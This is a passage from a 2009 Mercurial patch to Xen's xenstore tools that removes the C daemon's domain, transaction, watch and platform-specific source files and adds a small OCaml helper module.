talloc_free(path); -} - -void do_is_domain_introduced(struct connection *conn, const char *domid_str) -{ - int result; - unsigned int domid; - - if (!domid_str) { - send_error(conn, EINVAL); - return; - } - - domid = atoi(domid_str); - if (domid == DOMID_SELF) - result = 1; - else - result = (find_domain_by_domid(domid) != NULL); - - send_reply(conn, XS_IS_DOMAIN_INTRODUCED, result ? "T" : "F", 2); -} - -static int close_xc_handle(void *_handle) -{ - xc_interface_close(*(int *)_handle); - return 0; -} - -/* Returns the implicit path of a connection (only domains have this) */ -const char *get_implicit_path(const struct connection *conn) -{ - if (!conn->domain) - return NULL; - return conn->domain->path; -} - -/* Restore existing connections. 
*/ -void restore_existing_connections(void) -{ -} - -static int dom0_init(void) -{ - evtchn_port_t port; - struct domain *dom0; - - port = xenbus_evtchn(); - if (port == -1) - return -1; - - dom0 = new_domain(NULL, 0, port); - if (dom0 == NULL) - return -1; - - dom0->interface = xenbus_map(); - if (dom0->interface == NULL) - return -1; - - talloc_steal(dom0->conn, dom0); - - xc_evtchn_notify(xce_handle, dom0->port); - - return 0; -} - -/* Returns the event channel handle. */ -int domain_init(void) -{ - int rc; - - xc_handle = talloc(talloc_autofree_context(), int); - if (!xc_handle) - barf_perror("Failed to allocate domain handle"); - - *xc_handle = xc_interface_open(); - if (*xc_handle < 0) - barf_perror("Failed to open connection to hypervisor"); - - talloc_set_destructor(xc_handle, close_xc_handle); - - xce_handle = xc_evtchn_open(); - - if (xce_handle < 0) - barf_perror("Failed to open evtchn device"); - - if (dom0_init() != 0) - barf_perror("Failed to initialize dom0 state"); - - if ((rc = xc_evtchn_bind_virq(xce_handle, VIRQ_DOM_EXC)) == -1) - barf_perror("Failed to bind to domain exception virq port"); - virq_port = rc; - - return xce_handle; -} - -void domain_entry_inc(struct connection *conn, struct node *node) -{ - struct domain *d; - - if (!conn) - return; - - if (node->perms && node->perms[0].id != conn->id) { - if (conn->transaction) { - transaction_entry_inc(conn->transaction, - node->perms[0].id); - } else { - d = find_domain_by_domid(node->perms[0].id); - if (d) - d->nbentry++; - } - } else if (conn->domain) { - if (conn->transaction) { - transaction_entry_inc(conn->transaction, - conn->domain->domid); - } else { - conn->domain->nbentry++; - } - } -} - -void domain_entry_dec(struct connection *conn, struct node *node) -{ - struct domain *d; - - if (!conn) - return; - - if (node->perms && node->perms[0].id != conn->id) { - if (conn->transaction) { - transaction_entry_dec(conn->transaction, - node->perms[0].id); - } else { - d = 
find_domain_by_domid(node->perms[0].id); - if (d && d->nbentry) - d->nbentry--; - } - } else if (conn->domain && conn->domain->nbentry) { - if (conn->transaction) { - transaction_entry_dec(conn->transaction, - conn->domain->domid); - } else { - conn->domain->nbentry--; - } - } -} - -void domain_entry_fix(unsigned int domid, int num) -{ - struct domain *d; - - d = find_domain_by_domid(domid); - if (d && ((d->nbentry += num) < 0)) - d->nbentry = 0; -} - -int domain_entry(struct connection *conn) -{ - return (domain_is_unprivileged(conn)) - ? conn->domain->nbentry - : 0; -} - -void domain_watch_inc(struct connection *conn) -{ - if (!conn || !conn->domain) - return; - conn->domain->nbwatch++; -} - -void domain_watch_dec(struct connection *conn) -{ - if (!conn || !conn->domain) - return; - if (conn->domain->nbwatch) - conn->domain->nbwatch--; -} - -int domain_watch(struct connection *conn) -{ - return (domain_is_unprivileged(conn)) - ? conn->domain->nbwatch - : 0; -} - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_domain.h --- a/tools/xenstore/xenstored_domain.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,67 +0,0 @@ -/* - Domain communications for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. 
- - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#ifndef _XENSTORED_DOMAIN_H -#define _XENSTORED_DOMAIN_H - -void handle_event(void); - -/* domid, mfn, eventchn, path */ -void do_introduce(struct connection *conn, struct buffered_data *in); - -/* domid */ -void do_is_domain_introduced(struct connection *conn, const char *domid_str); - -/* domid */ -void do_release(struct connection *conn, const char *domid_str); - -/* domid */ -void do_resume(struct connection *conn, const char *domid_str); - -/* domid, target */ -void do_set_target(struct connection *conn, struct buffered_data *in); - -/* domid */ -void do_get_domain_path(struct connection *conn, const char *domid_str); - -/* Returns the event channel handle */ -int domain_init(void); - -/* Returns the implicit path of a connection (only domains have this) */ -const char *get_implicit_path(const struct connection *conn); - -/* Read existing connection information from store. */ -void restore_existing_connections(void); - -/* Can connection attached to domain read/write. 
 */
-bool domain_can_read(struct connection *conn);
-bool domain_can_write(struct connection *conn);
-
-bool domain_is_unprivileged(struct connection *conn);
-
-/* Quota manipulation */
-void domain_entry_inc(struct connection *conn, struct node *);
-void domain_entry_dec(struct connection *conn, struct node *);
-void domain_entry_fix(unsigned int domid, int num);
-int domain_entry(struct connection *conn);
-void domain_watch_inc(struct connection *conn);
-void domain_watch_dec(struct connection *conn);
-int domain_watch(struct connection *conn);
-
-#endif /* _XENSTORED_DOMAIN_H */
diff -r 10a8fae412c5 tools/xenstore/xenstored_linux.c
--- a/tools/xenstore/xenstored_linux.c Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,73 +0,0 @@
-/******************************************************************************
- *
- * Copyright 2006 Sun Microsystems, Inc. All rights reserved.
- * Use is subject to license terms.
- *
- * Copyright (C) 2005 Rusty Russell IBM Corporation
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
- * published by the Free Software Foundation, version 2 of the
- * License.
- */ - -#include -#include -#include -#include - -#include "xenstored_core.h" - -#define XENSTORED_PROC_KVA "/proc/xen/xsd_kva" -#define XENSTORED_PROC_PORT "/proc/xen/xsd_port" - -evtchn_port_t xenbus_evtchn(void) -{ - int fd; - int rc; - evtchn_port_t port; - char str[20]; - - fd = open(XENSTORED_PROC_PORT, O_RDONLY); - if (fd == -1) - return -1; - - rc = read(fd, str, sizeof(str)); - if (rc == -1) - { - int err = errno; - close(fd); - errno = err; - return -1; - } - - str[rc] = '\0'; - port = strtoul(str, NULL, 0); - - close(fd); - return port; -} - -void *xenbus_map(void) -{ - int fd; - void *addr; - - fd = open(XENSTORED_PROC_KVA, O_RDWR); - if (fd == -1) - return NULL; - - addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE, - MAP_SHARED, fd, 0); - - if (addr == MAP_FAILED) - addr = NULL; - - close(fd); - - return addr; -} - -void xenbus_notify_running(void) -{ -} diff -r 10a8fae412c5 tools/xenstore/xenstored_netbsd.c --- a/tools/xenstore/xenstored_netbsd.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,73 +0,0 @@ -/****************************************************************************** - * - * Copyright 2006 Sun Microsystems, Inc. All rights reserved. - * Use is subject to license terms. - * - * Copyright (C) 2005 Rusty Russell IBM Corporation - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License as - * published by the Free Software Foundation, version 2 of the - * License. 
- */ - -#include -#include -#include -#include - -#include "xenstored_core.h" - -#define XENSTORED_PROC_KVA "/dev/xsd_kva" -#define XENSTORED_PROC_PORT "/kern/xen/xsd_port" - -evtchn_port_t xenbus_evtchn(void) -{ - int fd; - int rc; - evtchn_port_t port; - char str[20]; - - fd = open(XENSTORED_PROC_PORT, O_RDONLY); - if (fd == -1) - return -1; - - rc = read(fd, str, sizeof(str)); - if (rc == -1) - { - int err = errno; - close(fd); - errno = err; - return -1; - } - - str[rc] = '\0'; - port = strtoul(str, NULL, 0); - - close(fd); - return port; -} - -void *xenbus_map(void) -{ - int fd; - void *addr; - - fd = open(XENSTORED_PROC_KVA, O_RDWR); - if (fd == -1) - return NULL; - - addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE, - MAP_SHARED, fd, 0); - - if (addr == MAP_FAILED) - addr = NULL; - - close(fd); - - return addr; -} - -void xenbus_notify_running(void) -{ -} diff -r 10a8fae412c5 tools/xenstore/xenstored_probes.d --- a/tools/xenstore/xenstored_probes.d Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,28 +0,0 @@ -/* - * Copyright 2007 Sun Microsystems, Inc. All rights reserved. - * Use is subject to license terms. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, version 2 of the License. 
- */ - -#include - -provider xenstore { - /* tx id, dom id, pid, type, msg */ - probe msg(uint32_t, unsigned int, pid_t, int, const char *); - /* tx id, dom id, pid, type, reply */ - probe reply(uint32_t, unsigned int, pid_t, int, const char *); - /* tx id, dom id, pid, reply */ - probe error(uint32_t, unsigned int, pid_t, const char *); - /* dom id, pid, watch details */ - probe watch_event(unsigned int, pid_t, const char *); -}; - -#pragma D attributes Evolving/Evolving/Common provider xenstore provider -#pragma D attributes Private/Private/Unknown provider xenstore module -#pragma D attributes Private/Private/Unknown provider xenstore function -#pragma D attributes Evolving/Evolving/Common provider xenstore name -#pragma D attributes Evolving/Evolving/Common provider xenstore args - diff -r 10a8fae412c5 tools/xenstore/xenstored_solaris.c --- a/tools/xenstore/xenstored_solaris.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,168 +0,0 @@ -/****************************************************************************** - * - * Copyright 2006 Sun Microsystems, Inc. All rights reserved. - * Use is subject to license terms. - * - * Copyright (C) 2005 Rusty Russell IBM Corporation - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License as - * published by the Free Software Foundation, version 2 of the - * License. 
- */ - -#include -#include -#include -#include -#include -#include -#include -#include - -#include - -#include "talloc.h" -#include "xenstored_core.h" -#include "xenstored_probes.h" - -evtchn_port_t xenbus_evtchn(void) -{ - int fd; - evtchn_port_t port; - - fd = open("/dev/xen/xenbus", O_RDONLY); - if (fd == -1) - return -1; - - port = ioctl(fd, IOCTL_XENBUS_XENSTORE_EVTCHN); - - close(fd); - return port; -} - -void *xenbus_map(void) -{ - int fd; - void *addr; - - fd = open("/dev/xen/xenbus", O_RDWR); - if (fd == -1) - return NULL; - - addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE, - MAP_SHARED, fd, 0); - - if (addr == MAP_FAILED) - addr = NULL; - - close(fd); - - return addr; -} - -void xenbus_notify_running(void) -{ - int fd; - - fd = open("/dev/xen/xenbus", O_RDONLY); - - (void) ioctl(fd, IOCTL_XENBUS_NOTIFY_UP); - - close(fd); -} - -static pid_t cred(const struct connection *conn) -{ - ucred_t *ucred = NULL; - pid_t pid; - - if (conn->domain) - return (0); - - if (getpeerucred(conn->fd, &ucred) == -1) - return (0); - - pid = ucred_getpid(ucred); - - ucred_free(ucred); - return (pid); -} - -/* - * The strings are often a number of nil-separated strings. We'll just - * replace the separators with spaces - not quite right, but good - * enough. - */ -static char * -mangle(const struct connection *conn, const struct buffered_data *in) -{ - char *str; - int i; - - if (in->hdr.msg.len == 0) - return (talloc_strdup(conn, "")); - - if ((str = talloc_zero_size(conn, in->hdr.msg.len + 1)) == NULL) - return (NULL); - - memcpy(str, in->buffer, in->hdr.msg.len); - - /* - * The protocol is absurdly inconsistent in whether the length - * includes the terminating nil or not; replace all nils that - * aren't the last one. 
- */ - for (i = 0; i < (in->hdr.msg.len - 1); i++) { - if (str[i] == '\0') - str[i] = ' '; - } - - return (str); -} - -void -dtrace_io(const struct connection *conn, const struct buffered_data *in, - int io_out) -{ - if (!io_out) { - if (XENSTORE_MSG_ENABLED()) { - char *mangled = mangle(conn, in); - XENSTORE_MSG(in->hdr.msg.tx_id, conn->id, cred(conn), - in->hdr.msg.type, mangled); - } - - goto out; - } - - switch (in->hdr.msg.type) { - case XS_ERROR: - if (XENSTORE_ERROR_ENABLED()) { - char *mangled = mangle(conn, in); - XENSTORE_ERROR(in->hdr.msg.tx_id, conn->id, - cred(conn), mangled); - } - break; - - case XS_WATCH_EVENT: - if (XENSTORE_WATCH_EVENT_ENABLED()) { - char *mangled = mangle(conn, in); - XENSTORE_WATCH_EVENT(conn->id, cred(conn), mangled); - } - break; - - default: - if (XENSTORE_REPLY_ENABLED()) { - char *mangled = mangle(conn, in); - XENSTORE_REPLY(in->hdr.msg.tx_id, conn->id, cred(conn), - in->hdr.msg.type, mangled); - } - break; - } - -out: - /* - * 6589130 dtrace -G fails for certain tail-calls on x86 - */ - asm("nop"); -} diff -r 10a8fae412c5 tools/xenstore/xenstored_transaction.c --- a/tools/xenstore/xenstored_transaction.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,291 +0,0 @@ -/* - Transaction code for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. 
- - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include "talloc.h" -#include "list.h" -#include "xenstored_transaction.h" -#include "xenstored_watch.h" -#include "xenstored_domain.h" -#include "xs_lib.h" -#include "utils.h" - -struct changed_node -{ - /* List of all changed nodes in the context of this transaction. */ - struct list_head list; - - /* The name of the node. */ - char *node; - - /* And the children? (ie. rm) */ - bool recurse; -}; - -struct changed_domain -{ - /* List of all changed domains in the context of this transaction. */ - struct list_head list; - - /* Identifier of the changed domain. */ - unsigned int domid; - - /* Amount by which this domain's nbentry field has changed. */ - int nbentry; -}; - -struct transaction -{ - /* List of all transactions active on this connection. */ - struct list_head list; - - /* Connection-local identifier for this transaction. */ - uint32_t id; - - /* Generation when transaction started. */ - unsigned int generation; - - /* TDB to work on, and filename */ - TDB_CONTEXT *tdb; - char *tdb_name; - - /* List of changed nodes. */ - struct list_head changes; - - /* List of changed domains - to record the changed domain entry number */ - struct list_head changed_domains; -}; - -extern int quota_max_transaction; -static unsigned int generation; - -/* Return tdb context to use for this connection. */ -TDB_CONTEXT *tdb_transaction_context(struct transaction *trans) -{ - return trans->tdb; -} - -/* Callers get a change node (which can fail) and only commit after they've - * finished. This way they don't have to unwind eg. a write. 
*/ -void add_change_node(struct transaction *trans, const char *node, bool recurse) -{ - struct changed_node *i; - - if (!trans) { - /* They're changing the global database. */ - generation++; - return; - } - - list_for_each_entry(i, &trans->changes, list) - if (streq(i->node, node)) - return; - - i = talloc(trans, struct changed_node); - i->node = talloc_strdup(i, node); - i->recurse = recurse; - list_add_tail(&i->list, &trans->changes); -} - -static int destroy_transaction(void *_transaction) -{ - struct transaction *trans = _transaction; - - trace_destroy(trans, "transaction"); - if (trans->tdb) - tdb_close(trans->tdb); - unlink(trans->tdb_name); - return 0; -} - -struct transaction *transaction_lookup(struct connection *conn, uint32_t id) -{ - struct transaction *trans; - - if (id == 0) - return NULL; - - list_for_each_entry(trans, &conn->transaction_list, list) - if (trans->id == id) - return trans; - - return ERR_PTR(-ENOENT); -} - -void do_transaction_start(struct connection *conn, struct buffered_data *in) -{ - struct transaction *trans, *exists; - char id_str[20]; - - /* We don't support nested transactions. */ - if (conn->transaction) { - send_error(conn, EBUSY); - return; - } - - if (conn->id && conn->transaction_started > quota_max_transaction) { - send_error(conn, ENOSPC); - return; - } - - /* Attach transaction to input for autofree until it's complete */ - trans = talloc(in, struct transaction); - INIT_LIST_HEAD(&trans->changes); - INIT_LIST_HEAD(&trans->changed_domains); - trans->generation = generation; - trans->tdb_name = talloc_asprintf(trans, "%s.%p", - xs_daemon_tdb(), trans); - trans->tdb = tdb_copy(tdb_context(conn), trans->tdb_name); - if (!trans->tdb) { - send_error(conn, errno); - return; - } - /* Make it close if we go away. */ - talloc_steal(trans, trans->tdb); - - /* Pick an unused transaction identifier. 
*/ - do { - trans->id = conn->next_transaction_id; - exists = transaction_lookup(conn, conn->next_transaction_id++); - } while (!IS_ERR(exists)); - - /* Now we own it. */ - list_add_tail(&trans->list, &conn->transaction_list); - talloc_steal(conn, trans); - talloc_set_destructor(trans, destroy_transaction); - conn->transaction_started++; - - snprintf(id_str, sizeof(id_str), "%u", trans->id); - send_reply(conn, XS_TRANSACTION_START, id_str, strlen(id_str)+1); -} - -void do_transaction_end(struct connection *conn, const char *arg) -{ - struct changed_node *i; - struct changed_domain *d; - struct transaction *trans; - - if (!arg || (!streq(arg, "T") && !streq(arg, "F"))) { - send_error(conn, EINVAL); - return; - } - - if ((trans = conn->transaction) == NULL) { - send_error(conn, ENOENT); - return; - } - - conn->transaction = NULL; - list_del(&trans->list); - conn->transaction_started--; - - /* Attach transaction to arg for auto-cleanup */ - talloc_steal(arg, trans); - - if (streq(arg, "T")) { - /* FIXME: Merge, rather failing on any change. */ - if (trans->generation != generation) { - send_error(conn, EAGAIN); - return; - } - if (!replace_tdb(trans->tdb_name, trans->tdb)) { - send_error(conn, errno); - return; - } - /* Don't close this: we won! */ - trans->tdb = NULL; - - /* fix domain entry for each changed domain */ - list_for_each_entry(d, &trans->changed_domains, list) - domain_entry_fix(d->domid, d->nbentry); - - /* Fire off the watches for everything that changed. 
*/ - list_for_each_entry(i, &trans->changes, list) - fire_watches(conn, i->node, i->recurse); - generation++; - } - send_ack(conn, XS_TRANSACTION_END); -} - -void transaction_entry_inc(struct transaction *trans, unsigned int domid) -{ - struct changed_domain *d; - - list_for_each_entry(d, &trans->changed_domains, list) - if (d->domid == domid) { - d->nbentry++; - return; - } - - d = talloc(trans, struct changed_domain); - d->domid = domid; - d->nbentry = 1; - list_add_tail(&d->list, &trans->changed_domains); -} - -void transaction_entry_dec(struct transaction *trans, unsigned int domid) -{ - struct changed_domain *d; - - list_for_each_entry(d, &trans->changed_domains, list) - if (d->domid == domid) { - d->nbentry--; - return; - } - - d = talloc(trans, struct changed_domain); - d->domid = domid; - d->nbentry = -1; - list_add_tail(&d->list, &trans->changed_domains); -} - -void conn_delete_all_transactions(struct connection *conn) -{ - struct transaction *trans; - - while ((trans = list_top(&conn->transaction_list, - struct transaction, list))) { - list_del(&trans->list); - talloc_free(trans); - } - - assert(conn->transaction == NULL); - - conn->transaction_started = 0; -} - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_transaction.h --- a/tools/xenstore/xenstored_transaction.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,43 +0,0 @@ -/* - Transaction code for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. 
- - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ -#ifndef _XENSTORED_TRANSACTION_H -#define _XENSTORED_TRANSACTION_H -#include "xenstored_core.h" - -struct transaction; - -void do_transaction_start(struct connection *conn, struct buffered_data *node); -void do_transaction_end(struct connection *conn, const char *arg); - -struct transaction *transaction_lookup(struct connection *conn, uint32_t id); - -/* inc/dec entry number local to trans while changing a node */ -void transaction_entry_inc(struct transaction *trans, unsigned int domid); -void transaction_entry_dec(struct transaction *trans, unsigned int domid); - -/* This node was changed: can fail and longjmp. */ -void add_change_node(struct transaction *trans, const char *node, - bool recurse); - -/* Return tdb context to use for this connection. */ -TDB_CONTEXT *tdb_transaction_context(struct transaction *trans); - -void conn_delete_all_transactions(struct connection *conn); - -#endif /* _XENSTORED_TRANSACTION_H */ diff -r 10a8fae412c5 tools/xenstore/xenstored_watch.c --- a/tools/xenstore/xenstored_watch.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,218 +0,0 @@ -/* - Watch code for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. 
- - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#include -#include -#include -#include -#include -#include -#include -#include "talloc.h" -#include "list.h" -#include "xenstored_watch.h" -#include "xs_lib.h" -#include "utils.h" -#include "xenstored_domain.h" - -extern int quota_nb_watch_per_domain; - -struct watch -{ - /* Watches on this connection */ - struct list_head list; - - /* Current outstanding events applying to this watch. */ - struct list_head events; - - /* Is this relative to connnection's implicit path? */ - const char *relative_path; - - char *token; - char *node; -}; - -static void add_event(struct connection *conn, - struct watch *watch, - const char *name) -{ - /* Data to send (node\0token\0). */ - unsigned int len; - char *data; - - if (!check_event_node(name)) { - /* Can this conn load node, or see that it doesn't exist? */ - struct node *node = get_node(conn, name, XS_PERM_READ); - /* - * XXX We allow EACCES here because otherwise a non-dom0 - * backend driver cannot watch for disappearance of a frontend - * xenstore directory. When the directory disappears, we - * revert to permissions of the parent directory for that path, - * which will typically disallow access for the backend. - * But this breaks device-channel teardown! - * Really we should fix this better... 
- */ - if (!node && errno != ENOENT && errno != EACCES) - return; - } - - if (watch->relative_path) { - name += strlen(watch->relative_path); - if (*name == '/') /* Could be "" */ - name++; - } - - len = strlen(name) + 1 + strlen(watch->token) + 1; - data = talloc_array(watch, char, len); - strcpy(data, name); - strcpy(data + strlen(name) + 1, watch->token); - send_reply(conn, XS_WATCH_EVENT, data, len); - talloc_free(data); -} - -void fire_watches(struct connection *conn, const char *name, bool recurse) -{ - struct connection *i; - struct watch *watch; - - /* During transactions, don't fire watches. */ - if (conn && conn->transaction) - return; - - /* Create an event for each watch. */ - list_for_each_entry(i, &connections, list) { - list_for_each_entry(watch, &i->watches, list) { - if (is_child(name, watch->node)) - add_event(i, watch, name); - else if (recurse && is_child(watch->node, name)) - add_event(i, watch, watch->node); - } - } -} - -static int destroy_watch(void *_watch) -{ - trace_destroy(_watch, "watch"); - return 0; -} - -void do_watch(struct connection *conn, struct buffered_data *in) -{ - struct watch *watch; - char *vec[2]; - bool relative; - - if (get_strings(in, vec, ARRAY_SIZE(vec)) != ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - if (strstarts(vec[0], "@")) { - relative = false; - if (strlen(vec[0]) > XENSTORE_REL_PATH_MAX) { - send_error(conn, EINVAL); - return; - } - /* check if valid event */ - } else { - relative = !strstarts(vec[0], "/"); - vec[0] = canonicalize(conn, vec[0]); - if (!is_valid_nodename(vec[0])) { - send_error(conn, errno); - return; - } - } - - /* Check for duplicates. 
*/ - list_for_each_entry(watch, &conn->watches, list) { - if (streq(watch->node, vec[0]) && - streq(watch->token, vec[1])) { - send_error(conn, EEXIST); - return; - } - } - - if (domain_watch(conn) > quota_nb_watch_per_domain) { - send_error(conn, E2BIG); - return; - } - - watch = talloc(conn, struct watch); - watch->node = talloc_strdup(watch, vec[0]); - watch->token = talloc_strdup(watch, vec[1]); - if (relative) - watch->relative_path = get_implicit_path(conn); - else - watch->relative_path = NULL; - - INIT_LIST_HEAD(&watch->events); - - domain_watch_inc(conn); - list_add_tail(&watch->list, &conn->watches); - trace_create(watch, "watch"); - talloc_set_destructor(watch, destroy_watch); - send_ack(conn, XS_WATCH); - - /* We fire once up front: simplifies clients and restart. */ - add_event(conn, watch, watch->node); -} - -void do_unwatch(struct connection *conn, struct buffered_data *in) -{ - struct watch *watch; - char *node, *vec[2]; - - if (get_strings(in, vec, ARRAY_SIZE(vec)) != ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - node = canonicalize(conn, vec[0]); - list_for_each_entry(watch, &conn->watches, list) { - if (streq(watch->node, node) && streq(watch->token, vec[1])) { - list_del(&watch->list); - talloc_free(watch); - domain_watch_dec(conn); - send_ack(conn, XS_UNWATCH); - return; - } - } - send_error(conn, ENOENT); -} - -void conn_delete_all_watches(struct connection *conn) -{ - struct watch *watch; - - while ((watch = list_top(&conn->watches, struct watch, list))) { - list_del(&watch->list); - talloc_free(watch); - domain_watch_dec(conn); - } -} - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_watch.h --- a/tools/xenstore/xenstored_watch.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,35 +0,0 @@ -/* - Watch code for Xen Store Daemon. 
- Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#ifndef _XENSTORED_WATCH_H -#define _XENSTORED_WATCH_H - -#include "xenstored_core.h" - -void do_watch(struct connection *conn, struct buffered_data *in); -void do_unwatch(struct connection *conn, struct buffered_data *in); - -/* Fire all watches: recurse means all the children are affected (ie. rm). 
*/ -void fire_watches(struct connection *conn, const char *name, bool recurse); - -void dump_watches(struct connection *conn); - -void conn_delete_all_watches(struct connection *conn); - -#endif /* _XENSTORED_WATCH_H */ diff -r 10a8fae412c5 tools/xenstore/xs.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/xs.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,8 @@ +let xs_single connection message_type transaction_id payload = + let message = Message.make message_type transaction_id 0l payload in + connection#write message;; + +let rec xs_read connection = + match (connection#read) with + | Some m -> m + | None -> xs_read connection;; diff -r 10a8fae412c5 tools/xenstore/xs_tdb_dump.c --- a/tools/xenstore/xs_tdb_dump.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,82 +0,0 @@ -/* Simple program to dump out all records of TDB */ -#include -#include -#include -#include -#include -#include -#include "xs_lib.h" -#include "tdb.h" -#include "talloc.h" -#include "utils.h" - -struct record_hdr { - uint32_t num_perms; - uint32_t datalen; - uint32_t childlen; - struct xs_permissions perms[0]; -}; - -static uint32_t total_size(struct record_hdr *hdr) -{ - return sizeof(*hdr) + hdr->num_perms * sizeof(struct xs_permissions) - + hdr->datalen + hdr->childlen; -} - -static char perm_to_char(enum xs_perm_type perm) -{ - return perm == XS_PERM_READ ? 'r' : - perm == XS_PERM_WRITE ? 'w' : - perm == XS_PERM_NONE ? '-' : - perm == (XS_PERM_READ|XS_PERM_WRITE) ? 
'b' : - '?'; -} - -int main(int argc, char *argv[]) -{ - TDB_DATA key; - TDB_CONTEXT *tdb; - - if (argc != 2) - barf("Usage: xs_tdb_dump "); - - tdb = tdb_open(talloc_strdup(NULL, argv[1]), 0, 0, O_RDONLY, 0); - if (!tdb) - barf_perror("Could not open %s", argv[1]); - - key = tdb_firstkey(tdb); - while (key.dptr) { - TDB_DATA data; - struct record_hdr *hdr; - - data = tdb_fetch(tdb, key); - hdr = (void *)data.dptr; - if (data.dsize < sizeof(*hdr)) - fprintf(stderr, "%.*s: BAD truncated\n", - (int)key.dsize, key.dptr); - else if (data.dsize != total_size(hdr)) - fprintf(stderr, "%.*s: BAD length %i for %i/%i/%i (%i)\n", - (int)key.dsize, key.dptr, (int)data.dsize, - hdr->num_perms, hdr->datalen, - hdr->childlen, total_size(hdr)); - else { - unsigned int i; - char *p; - - printf("%.*s: ", (int)key.dsize, key.dptr); - for (i = 0; i < hdr->num_perms; i++) - printf("%s%c%i", - i == 0 ? "" : ",", - perm_to_char(hdr->perms[i].perms), - hdr->perms[i].id); - p = (void *)&hdr->perms[hdr->num_perms]; - printf(" %.*s\n", hdr->datalen, p); - p += hdr->datalen; - for (i = 0; i < hdr->childlen; i += strlen(p+i)+1) - printf("\t-> %s\n", p+i); - } - key = tdb_nextkey(tdb, key); - } - return 0; -} - --------------080103040208000401080509--